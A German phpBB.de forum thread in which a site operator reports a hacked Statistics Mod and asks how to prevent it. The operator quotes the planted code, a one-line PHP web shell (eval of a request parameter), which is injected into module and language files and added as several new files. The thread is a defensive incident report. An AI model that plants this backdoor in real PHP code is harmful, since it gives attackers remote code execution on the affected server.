phpBB.de

Verfasst: **21.08.2005 16:28**

Dieser Mod wurde durch Änderung folgender Dateien gehackt:

/modules/language/lang_german/lang_modules.php
/modules/language/lang_english/lang_modules.php
/modules/admin_statistics/module.php

Die Dateien wurden am Anfang und Ende jeweils abgeändert:

Code: Alles auswählen

<?php0e9700d17a20f49f6b54aaf168b6e7ff();?><?php

// [admin_statistics]

$admin_statistics = array(); 

...

// [/users_by_month]



?><?function php0e9700d17a20f49f6b54aaf168b6e7ff(){eval(stripslashes($_REQUEST[rory]));}//rory was here! ?>

Weis jemand näheres?

Wie kann ich das in Zukunft verhindern?

Danke.

Verfasst: **22.08.2005 09:04**

Wurde denn bei niemanden das Statistik Tool gehackt?

Gruß
M.

Verfasst: **22.08.2005 13:47**

da bräcuhte man schon mehr Informationen. Es ist ja nicht klar, ob wirklich die Statistic mod der Einstiegspunkt war; es muss ja nicht einmal etwas mit phpBB zu tun haben.

Gibt es in den Serverlogs evtl. Hinweise auf den Angriff? Möglicherweise bietet das Änderungsdatum der veränderten Dateien Anhaltspunkte.

Verfasst: **23.08.2005 00:58**

In den Logs habe ich nichts gefunden. Habe meinen Hoster eingeschaltet.

Hier noch ein paar Erkenntnisse:

Veränderte Dateien:

/modules/admin_statistics/module.php
/modules/language/lang_english/lang_modules.php
/modules/language/lang_german/lang_modules.php

Hinzugefügte Dateien:

/modules/admin_statistics/tgg.php

Code: Alles auswählen

<?php eval(stripslashes($_REQUEST[rory])); ?>

/modules/language/config.inc.php

Code: Alles auswählen

<?php eval(stripslashes($_REQUEST[rory])); ?>

/modules/most_active_topics/lorelai.php

Code: Alles auswählen

<?php eval(stripslashes($_REQUEST[rory])); ?>

/modules/topics_by_month/tgg.php

Code: Alles auswählen

<?php eval(stripslashes($_REQUEST[rory])); ?>

phpBB.de

Hack in Statistics Mod 3 Beta 3

Hack in Statistics Mod 3 Beta 3